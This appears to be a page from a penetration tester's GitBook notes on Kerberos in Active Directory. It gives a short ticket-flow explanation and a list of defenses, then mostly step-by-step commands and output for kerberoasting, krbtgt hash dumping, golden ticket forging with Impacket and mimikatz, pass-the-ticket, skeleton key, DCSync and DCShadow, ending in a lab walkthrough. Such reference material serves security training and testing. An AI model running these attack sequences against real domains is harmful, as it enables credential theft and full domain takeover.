Pentest
  • Homepage
  • Pentest Links
  • 01 Prep
    • Target Inventory
    • OSINT and Dorks
    • Recon-ng dns zone snoop
    • ❤️Gitbook
  • 02 Scan
    • *Favorites
    • Burp
    • Dirb nikto wpscan etc
    • Enum Finger and Brute SSH
    • Fuzzing
    • Nmap
    • Open Port Checks OneLiner
    • Port Knocking
    • SSL Issues
    • Tcpdump
  • 03 Getting In
    • Char Evasion Tricks
    • Email SMTP
    • Eternal Blue
    • FTP
    • heartbleed
    • Metasploit
    • MySql
    • NFS
    • Oracle
    • Postgres
    • PowerShell Empire
    • Shells
    • rpc
    • SMB Samba
    • SSH Tips
    • SQLite3
    • Veil
  • 04 WebApps
    • Apache
    • Blogs
    • Coldfusion
    • Content Management (CMS)
    • Drupal
    • Elastix FreePBX
    • HttpFileServer (HFS)
    • IIS
    • IIS6 WebDav
    • Local File Inclusion (LFI)
    • Magento
    • Nagios
    • PFSense
    • php
    • php type juggling
    • phpLite
    • Web Injections
    • Javascript
    • Shellshock
    • SQL Injections (sqli)
    • SQLMap
    • WAF
    • Webmin
    • Web Scrape
    • Wordpress
  • 05 Passwords & Ciphers
    • Cipher Decrypt
    • Cipher RSA Wiener P-Q-E
    • Cracking
    • Dict Guess List Mangle
    • Get Hashes
    • Hydra Brutes
    • Images Exif Steg
    • Malware Analysis
    • Pull Hashes PCredz
    • SSH PrivKey Passphrase
    • Unzip Crack
    • Windows PW
  • 06 Linux PrivEsc
    • 1 Look Around
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • binaries
    • Buffer Overflow
    • bash prison
    • Monitor Files
    • mongodb node
    • Pivots
    • Remote Execute
    • Shell TTY Fix
    • TAR backups
    • Transfer Files
    • vnc
  • 07 Windows PrivEsc
    • 1 Windows cmd kungfu
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • Bloodhound
    • DLL Hijack MSF
    • Kerberos
    • Memory Analysis
    • NTDS
    • Powershell
    • Responder
    • Saved Creds runas
Powered by GitBook
On this page
  • General
  • Ticket Flow
  • 3 Long-Term Keys
  • Group Policy for TGT Encryption
  • Attack Flow
  • Kerberoasting Targets
  • Defenses:
  • Kerberoasting
  • Golden Ticket
  • Get the nthash
  • Get the FQDN
  • Get the Domain SID
  • Create a golden ticket!
  • Abuse
  • Mimikatz
  • Skeleton Key (mimikatz)
  • DCSync (mimikatz)
  • DCShadow
  • Mimikatz GT Lab

Was this helpful?

  1. 07 Windows PrivEsc

Kerberos

General

  • 3 Heads of Kerberos:

    • Client > TrustedServer/DC > Server

Ticket Flow

Ticket Flow

Example

Request TGT >

Apply for Drivers License >

< TGT + SessionKey

< Granted with Hologram

TGT + Request to TGS >

Request go to to ABC Store >

< ServiceTicket

< Approved w/ ABC Hash/Ticket

Auth to Service w/ServiceTicket >

Going to ABC Store >

3 Long-Term Keys

  1. Client (me)

  2. Target/Service key

  3. KDC (from krbtgt acct)

Group Policy for TGT Encryption

  • Computer Config > Policy > Windows Settings > Security Settings

  • > Local Policy > Security Options Network Security: Configure enc types allowed for Kerb

Attack Flow

  1. Find AD Accts with SPN (map between service and svc-acct)

  2. Request RC4 service tickets from DC

  3. Extract Service Tickets to file

  4. Offline Brute Force

Kerberoasting Targets

  1. MSSQL

  2. AGPMServer (for GPO)

  3. FIMService (Forefront Identity)

  4. STS (Security Token Service VMWare)

Defenses:

  • Disable RC4 with GPO

  • Use AES instead

  • Managed Service Accounts (no pw to change)

  • Protected Users - pw kerberos keys arent in lsass mem

  • PAC validation

  • CredentialGuard - hash and kerb/keys cant be stolen

  • Services like: "sqlsvc" should not be Domain Admin

Kerberoasting

Connect to pc:
PsExec64.exe -accepteula -u bob \\$IP cmd.exe
pw-prompt: xxxx
whoami   ..bob
ipconfig ..$IP

Pull SPN's
cd \tools\ke*
> cscript.exe GetUserSPNs.vbs   ...or:
> GetUserSPNs.py -request domain\bob -dc-ip $IP > spns.output
Found 'svcqlserver' w/RC4 (bad encryption)

Request Ticket for svcsqlserver:
C:\Tools\Kerb\powershell.exe -command "Add-Type -AssemblyName System.IdentityModel; New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'svcsqlserver/dc.domain.local:1433'"

Optional: Grabs tickets with Mimikatz and export to a list
cd ../mim*/x64/
mimikatz.exe
kerberos::list /export
exit

Crack the Kerb:
cd C:\Tools\Kerberoast\
python tgsrepcrack.py dictionary.txt file.kirbi
hashcat -m 13100 -a 0 spns.output /usr/local/..examp.dict

Connect:
cd c:\Tools\Sysinternals\
PsExec64.exe -accepteula -u mydom/svcsqlserver \\$IP cmd.exe
wmiexec.py mydom/svcsqlserver@10.10.10.5 whoami
pw-prompt: crackedpw
hostname .. DC
net user svcsqlserver /domain   ..part of Domain Admins, yikes!
win !!

  • Other Method:

    • Powerview > Invoke-Kerberoast

Golden Ticket

  • Impacket:

    • secretsdump.py

    • wmiexec.py

    • lookupsid.py

    • ticketer.py

Get the nthash

> secretsdump.py mydom/svcsqlserver@$IP -just-dc-user krbtgt

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:abcxyz123...:thenthashxyz1111:::
                          |
                        nthash

Get the FQDN

> wmiexec.py mydom/svcsqlserver@$IP ipconfig /all

Windows IP Configuration
   Host Name . . . . . . . . . . . . : DC01
   Primary Dns Suffix  . . . . . . . : mydom

Get the Domain SID

> lookupsid.py mydom/svcsqlserver@$IP

Password:
[*] Brute forcing SIDs at $IP
[*] StringBinding ncacn_np:$IP[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-111122222-3333334444-5555566666

Create a golden ticket!

> ticketer.py -domain mydom -domain-sid S-1-5-21-111122222-3333334444-5555566666 -nthash thenthashxyz1111 Administrator

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for mydom/Administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncAsRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncASRepPart
[*] Saving ticket in Administrator.ccache

Abuse

  • The golden ticket - DO NOT EXECUTE !!!

  • After exporting the Administrator.ccache ticket file..

  • You can use any tool from the impacket suite like wmiexec or psexec with -k -no-pass

> export KRB5CCNAME=Administrator.ccache
> wmiexec.py mydom/svcsqlserver@$IP ipconfig /all -k --no-pass

Mimikatz

  • Create a Golden Ticket with Mimikatz

mimikatz > kerberos::golden /krbtgt :e19xyz... /admin:root
/domain:mydom /sid:S-1-5-21.. /ticket:golden.ticket.bin
Creates "golden.ticket.bin"

pass-the-ticket (ptt)
mimikatz > ptt golden.ticket.bin

Skeleton Key (mimikatz)

  • Sets up a special key for login as pw: mimikatz

  • Patches the LSA Process in Memory

  • Requires Admin rights and Debug Privs

  • Reboot to 'clear' the setup

mimikatz# privilege::debug
mimikatz# misc::skeleton
Done!

DCSync (mimikatz)

  • Copies the "ntds.dit"

m> lsadump:dcsync /user:administrator

DCShadow

  • Similar to DCSync

  • Register myself as a DC

  • Uses replication, so almost invisible Logging

Mimikatz GT Lab

-----------------
Start
cd \Tools\SysInternalsSuite\
PsExec64.exe -accepteula -u mydomain\svcsqlserver \\$IP cmd.exe
c:\Windows\System32  ..now on $IP!!
whoami /user  ..get the sid

-----------------
Imposter:
cd \tools\m*\x64
> mimikatz.exe
m> lsadump::dcsync /user:fakedc
.. i'm a dc named 'fakedc'
.. Creds: we got the ntlm hash

-----------------
Ticket:
m> kerberos::golden /rc4:xyzhash /user:administrator /domain:mydomain /sid:xyzsid
Created: "ticket.kirbi"

-----------------
Pass-the-ticket
\\10.10.10.10\c$ ..copy the ticket
cd \tools\m*\x64
> mimikatz.exe
kerberos::ptt c:\Users\me\Desktop\ticket.kirbi
exit
klist  ..shows the tickets

-----------------
Exploit:
From 10.10.10.10
PsExec64.exe -accepteula \\dc01 cmd.exe   ..will use the ticket for auth!
PreviousDLL Hijack MSFNextMemory Analysis

Last updated 2 years ago

Was this helpful?

REF:

NTDS